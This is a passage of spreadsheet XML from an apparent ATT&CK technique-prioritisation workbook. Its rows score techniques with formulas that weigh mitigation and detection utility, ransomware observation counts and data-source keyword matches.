      <c r="L80" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M80" s="37">
        <v>1.5708E-2</v>
      </c>
      <c r="N80" s="56">
        <v>2</v>
      </c>
      <c r="O80" s="56">
        <v>11</v>
      </c>
      <c r="P80" s="56">
        <v>1</v>
      </c>
      <c r="Q80" s="56">
        <v>0</v>
      </c>
      <c r="R80" s="57" t="s">
        <v>309</v>
      </c>
      <c r="S80" s="57">
        <v>13</v>
      </c>
      <c r="T80" s="57" t="s">
        <v>310</v>
      </c>
      <c r="U80" s="57">
        <v>11</v>
      </c>
      <c r="V80" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.29523828571428573</v>
      </c>
      <c r="W80" s="37">
        <v>24</v>
      </c>
      <c r="X80" s="37">
        <v>0.43636399999999997</v>
      </c>
      <c r="Y80" s="37">
        <v>0.43636399999999997</v>
      </c>
      <c r="Z80" s="37">
        <v>14</v>
      </c>
      <c r="AA80" s="37">
        <v>0.14000000000000001</v>
      </c>
      <c r="AB80" s="37">
        <v>0.14000000000000001</v>
      </c>
      <c r="AC80" s="37"/>
      <c r="AD80" s="50" t="s">
        <v>311</v>
      </c>
      <c r="AE80" s="37" t="str" cm="1">
        <f t="array" ref="AE80">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD80)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF80" s="37">
        <v>76</v>
      </c>
      <c r="AG80" s="37" t="str" cm="1">
        <f t="array" ref="AG80">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD80)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH80" s="37">
        <v>76</v>
      </c>
      <c r="AI80" s="37" t="str" cm="1">
        <f t="array" ref="AI80">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD80)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ80" s="37">
        <v>76</v>
      </c>
      <c r="AK80" s="37" t="str" cm="1">
        <f t="array" ref="AK80">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD80)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL80" s="37">
        <v>76</v>
      </c>
      <c r="AM80" s="37" t="str" cm="1">
        <f t="array" ref="AM80">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD80)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN80" s="37">
        <v>0</v>
      </c>
      <c r="AO80" s="37">
        <v>2</v>
      </c>
      <c r="AP80" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ80" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>41.779539047619046</v>
      </c>
      <c r="AR80" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS80" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT80" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU8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2.0371209070294785</v>
      </c>
    </row>
    <row r="81" spans="1:47" ht="51">
      <c r="A81" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.5</v>
      </c>
      <c r="B81" s="37">
        <f t="shared" si="1"/>
        <v>674.64992642857135</v>
      </c>
      <c r="C81" s="37" t="s">
        <v>312</v>
      </c>
      <c r="D81" s="50" t="s">
        <v>313</v>
      </c>
      <c r="E81" s="37"/>
      <c r="F81" s="37">
        <v>3</v>
      </c>
      <c r="G81" s="37">
        <v>12</v>
      </c>
      <c r="H81" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.65</v>
      </c>
      <c r="I81" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.3</v>
      </c>
      <c r="J81" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="K81" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>1.2</v>
      </c>
      <c r="L81" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>1</v>
      </c>
      <c r="M81" s="37">
        <v>1</v>
      </c>
      <c r="N81" s="56">
        <v>3</v>
      </c>
      <c r="O81" s="56">
        <v>40</v>
      </c>
      <c r="P81" s="56">
        <v>5</v>
      </c>
      <c r="Q81" s="56">
        <v>14</v>
      </c>
      <c r="R81" s="57" t="s">
        <v>314</v>
      </c>
      <c r="S81" s="57">
        <v>7</v>
      </c>
      <c r="T81" s="57" t="s">
        <v>315</v>
      </c>
      <c r="U81" s="57">
        <v>18</v>
      </c>
      <c r="V81" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.53333309523809524</v>
      </c>
      <c r="W81" s="37">
        <v>25</v>
      </c>
      <c r="X81" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Y81" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Z81" s="37">
        <v>62</v>
      </c>
      <c r="AA81" s="37">
        <v>0.62</v>
      </c>
      <c r="AB81" s="37">
        <v>0.62</v>
      </c>
      <c r="AC81" s="37"/>
      <c r="AD81" s="50" t="s">
        <v>316</v>
      </c>
      <c r="AE81" s="37" t="str" cm="1">
        <f t="array" ref="AE81">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD81)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF81" s="37">
        <v>77</v>
      </c>
      <c r="AG81" s="37" t="str" cm="1">
        <f t="array" ref="AG81">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD81)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH81" s="37">
        <v>77</v>
      </c>
      <c r="AI81" s="37" t="str" cm="1">
        <f t="array" ref="AI81">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD81)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ81" s="37">
        <v>77</v>
      </c>
      <c r="AK81" s="37" t="str" cm="1">
        <f t="array" ref="AK81">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD81)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL81" s="37">
        <v>77</v>
      </c>
      <c r="AM81" s="37" t="str" cm="1">
        <f t="array" ref="AM81">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD81)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN81" s="37">
        <v>0</v>
      </c>
      <c r="AO81" s="37">
        <v>6</v>
      </c>
      <c r="AP81" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.5</v>
      </c>
      <c r="AQ81" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>224.88330880952378</v>
      </c>
      <c r="AR81" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS81" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AT81" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AU8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32.269044115646253</v>
      </c>
    </row>
    <row r="82" spans="1:47" ht="68">
      <c r="A82" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B82" s="37">
        <f t="shared" si="1"/>
        <v>163.03438176190477</v>
      </c>
      <c r="C82" s="37" t="s">
        <v>317</v>
      </c>
      <c r="D82" s="50" t="s">
        <v>318</v>
      </c>
      <c r="E82" s="37"/>
      <c r="F82" s="37">
        <v>1</v>
      </c>
      <c r="G82" s="37">
        <v>1</v>
      </c>
      <c r="H82" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I82" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J82" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K82" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L82" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M82" s="37">
        <v>1.8289999999999999E-3</v>
      </c>
      <c r="N82" s="56">
        <v>0</v>
      </c>
      <c r="O82" s="56">
        <v>7</v>
      </c>
      <c r="P82" s="56">
        <v>6</v>
      </c>
      <c r="Q82" s="56">
        <v>9</v>
      </c>
      <c r="R82" s="57" t="s">
        <v>319</v>
      </c>
      <c r="S82" s="57">
        <v>10</v>
      </c>
      <c r="T82" s="57" t="s">
        <v>320</v>
      </c>
      <c r="U82" s="57">
        <v>23</v>
      </c>
      <c r="V82" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.419047619047619</v>
      </c>
      <c r="W82" s="37">
        <v>33</v>
      </c>
      <c r="X82" s="37">
        <v>0.6</v>
      </c>
      <c r="Y82" s="37">
        <v>0.6</v>
      </c>
      <c r="Z82" s="37">
        <v>22</v>
      </c>
      <c r="AA82" s="37">
        <v>0.22</v>
      </c>
      <c r="AB82" s="37">
        <v>0.22</v>
      </c>
      <c r="AC82" s="37"/>
      <c r="AD82" s="50" t="s">
        <v>143</v>
      </c>
      <c r="AE82" s="37" t="str" cm="1">
        <f t="array" ref="AE82">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD82)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF82" s="37">
        <v>78</v>
      </c>
      <c r="AG82" s="37" t="str" cm="1">
        <f t="array" ref="AG82">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD82)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH82" s="37">
        <v>78</v>
      </c>
      <c r="AI82" s="37" t="str" cm="1">
        <f t="array" ref="AI82">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD82)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ82" s="37">
        <v>78</v>
      </c>
      <c r="AK82" s="37" t="str" cm="1">
        <f t="array" ref="AK82">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD82)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL82" s="37">
        <v>78</v>
      </c>
      <c r="AM82" s="37" t="str" cm="1">
        <f t="array" ref="AM82">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD82)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN82" s="37">
        <v>0</v>
      </c>
      <c r="AO82" s="37">
        <v>1</v>
      </c>
      <c r="AP82" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ82" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>54.34479392063492</v>
      </c>
      <c r="AR82" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS82" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT82" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU8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1.3177331885865458</v>
      </c>
    </row>
    <row r="83" spans="1:47" ht="68">
      <c r="A83" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B83" s="37">
        <f t="shared" si="1"/>
        <v>99.628571428571448</v>
      </c>
      <c r="C83" s="37" t="s">
        <v>321</v>
      </c>
      <c r="D83" s="50" t="s">
        <v>318</v>
      </c>
      <c r="E83" s="37" t="s">
        <v>322</v>
      </c>
      <c r="F83" s="37">
        <v>1</v>
      </c>
      <c r="G83" s="37">
        <v>1</v>
      </c>
      <c r="H83" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I83" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J83" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K83" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L83" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M83" s="37">
        <v>0</v>
      </c>
      <c r="N83" s="56">
        <v>0</v>
      </c>
      <c r="O83" s="56">
        <v>1</v>
      </c>
      <c r="P83" s="56">
        <v>0</v>
      </c>
      <c r="Q83" s="56">
        <v>0</v>
      </c>
      <c r="R83" s="57" t="s">
        <v>319</v>
      </c>
      <c r="S83" s="57">
        <v>10</v>
      </c>
      <c r="T83" s="57" t="s">
        <v>323</v>
      </c>
      <c r="U83" s="57">
        <v>12</v>
      </c>
      <c r="V83" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.21428571428571433</v>
      </c>
      <c r="W83" s="37">
        <v>22</v>
      </c>
      <c r="X83" s="37">
        <v>0.4</v>
      </c>
      <c r="Y83" s="37">
        <v>0.4</v>
      </c>
      <c r="Z83" s="37">
        <v>1</v>
      </c>
      <c r="AA83" s="37">
        <v>0.01</v>
      </c>
      <c r="AB83" s="37">
        <v>0.01</v>
      </c>
      <c r="AC83" s="37"/>
      <c r="AD83" s="50" t="s">
        <v>143</v>
      </c>
      <c r="AE83" s="37" t="str" cm="1">
        <f t="array" ref="AE83">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD83)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF83" s="37">
        <v>79</v>
      </c>
      <c r="AG83" s="37" t="str" cm="1">
        <f t="array" ref="AG83">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD83)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH83" s="37">
        <v>79</v>
      </c>
      <c r="AI83" s="37" t="str" cm="1">
        <f t="array" ref="AI83">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD83)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ83" s="37">
        <v>79</v>
      </c>
      <c r="AK83" s="37" t="str" cm="1">
        <f t="array" ref="AK83">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD83)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL83" s="37">
        <v>79</v>
      </c>
      <c r="AM83" s="37" t="str" cm="1">
        <f t="array" ref="AM83">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD83)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN83" s="37">
        <v>0</v>
      </c>
      <c r="AO83" s="37">
        <v>0</v>
      </c>
      <c r="AP83" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ83" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>33.209523809523816</v>
      </c>
      <c r="AR83" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS83" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT83" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU8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84" spans="1:47" ht="68">
      <c r="A84" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B84" s="37">
        <f t="shared" si="1"/>
        <v>132.98571428571427</v>
      </c>
      <c r="C84" s="37" t="s">
        <v>324</v>
      </c>
      <c r="D84" s="50" t="s">
        <v>318</v>
      </c>
      <c r="E84" s="37" t="s">
        <v>325</v>
      </c>
      <c r="F84" s="37">
        <v>1</v>
      </c>
      <c r="G84" s="37">
        <v>1</v>
      </c>
      <c r="H84" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I84" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J84" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K84" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L84" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M84" s="37">
        <v>0</v>
      </c>
      <c r="N84" s="56">
        <v>0</v>
      </c>
      <c r="O84" s="56">
        <v>0</v>
      </c>
      <c r="P84" s="56">
        <v>0</v>
      </c>
      <c r="Q84" s="56">
        <v>0</v>
      </c>
      <c r="R84" s="57" t="s">
        <v>319</v>
      </c>
      <c r="S84" s="57">
        <v>10</v>
      </c>
      <c r="T84" s="57" t="s">
        <v>320</v>
      </c>
      <c r="U84" s="57">
        <v>23</v>
      </c>
      <c r="V84" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.31428571428571428</v>
      </c>
      <c r="W84" s="37">
        <v>33</v>
      </c>
      <c r="X84" s="37">
        <v>0.6</v>
      </c>
      <c r="Y84" s="37">
        <v>0.6</v>
      </c>
      <c r="Z84" s="37">
        <v>0</v>
      </c>
      <c r="AA84" s="37">
        <v>0</v>
      </c>
      <c r="AB84" s="37">
        <v>0</v>
      </c>
      <c r="AC84" s="37"/>
      <c r="AD84" s="50" t="s">
        <v>143</v>
      </c>
      <c r="AE84" s="37" t="str" cm="1">
        <f t="array" ref="AE84">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD84)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF84" s="37">
        <v>80</v>
      </c>
      <c r="AG84" s="37" t="str" cm="1">
        <f t="array" ref="AG84">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD84)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH84" s="37">
        <v>80</v>
      </c>
      <c r="AI84" s="37" t="str" cm="1">
        <f t="array" ref="AI84">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD84)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ84" s="37">
        <v>80</v>
      </c>
      <c r="AK84" s="37" t="str" cm="1">
        <f t="array" ref="AK84">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD84)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL84" s="37">
        <v>80</v>
      </c>
      <c r="AM84" s="37" t="str" cm="1">
        <f t="array" ref="AM84">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD84)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN84" s="37">
        <v>0</v>
      </c>
      <c r="AO84" s="37">
        <v>0</v>
      </c>
      <c r="AP84" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ84" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>44.328571428571422</v>
      </c>
      <c r="AR84" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS84" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT84" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU8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85" spans="1:47" ht="68">
      <c r="A85" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B85" s="37">
        <f t="shared" si="1"/>
        <v>173.33336428571431</v>
      </c>
      <c r="C85" s="37" t="s">
        <v>326</v>
      </c>
      <c r="D85" s="50" t="s">
        <v>318</v>
      </c>
      <c r="E85" s="37" t="s">
        <v>327</v>
      </c>
      <c r="F85" s="37">
        <v>1</v>
      </c>
      <c r="G85" s="37">
        <v>1</v>
      </c>
      <c r="H85" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I85" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J85" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K85" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L85" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M85" s="37">
        <v>0</v>
      </c>
      <c r="N85" s="56">
        <v>0</v>
      </c>
      <c r="O85" s="56">
        <v>14</v>
      </c>
      <c r="P85" s="56">
        <v>0</v>
      </c>
      <c r="Q85" s="56">
        <v>9</v>
      </c>
      <c r="R85" s="57" t="s">
        <v>319</v>
      </c>
      <c r="S85" s="57">
        <v>10</v>
      </c>
      <c r="T85" s="57" t="s">
        <v>328</v>
      </c>
      <c r="U85" s="57">
        <v>24</v>
      </c>
      <c r="V85" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.43333342857142859</v>
      </c>
      <c r="W85" s="37">
        <v>34</v>
      </c>
      <c r="X85" s="37">
        <v>0.61818200000000001</v>
      </c>
      <c r="Y85" s="37">
        <v>0.61818200000000001</v>
